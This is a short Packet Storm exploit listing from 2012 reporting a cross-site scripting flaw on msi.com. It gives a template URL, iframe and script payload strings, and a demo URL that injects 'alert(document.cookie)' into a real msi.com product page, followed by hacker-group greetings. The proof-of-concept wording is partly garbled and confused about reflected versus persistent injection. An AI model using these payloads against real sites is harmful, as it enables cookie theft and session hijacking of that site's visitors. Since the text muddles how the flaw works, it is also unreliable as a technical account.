Profile image for mrk studios Ryuzaki Lawlet on June 4, 2012
Msi.com suffers from a cross site scripting vulnerability. The site has not responded to the author's reports regarding the vulnerability.
Platforms
na
Category
webapps
Tags
exploit xss
Source
packetstormsecurity.org
Download
Exploit Code

Msi.com Cross Site Scripting


##################################################
# Exploit Title: Msi.com XSS Vulnerability
# Date: 2/06/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# Security:RISK: High
# Vendor or Software Link: 
# Google dork: -
# Tested on: Linux
##################################################

[~]Exploit/p0c :

http://localhost:80/[path]/[path]/#/?sk=[xss]

[~]Proof of Concept:

1.1
he issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context. 

 Strings: >"<<iframe src=http://justryuz.blogspot.com>3</iframe> OR >"<script>alert(document.cookie)</script>

 [~]Dem0 :

 http://msi.com/product/windpad/#/?sk=<script>alert(document.cookie)</script>


 FB : www.fb.me/justryuz
 +---------------------------------------------------+
   Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]
[ And all my Freinds + Malaysian + Indonesia + Gaza &amp; Turki ]
-----------------------------------------------------+


Comments

blog comments powered by Disqus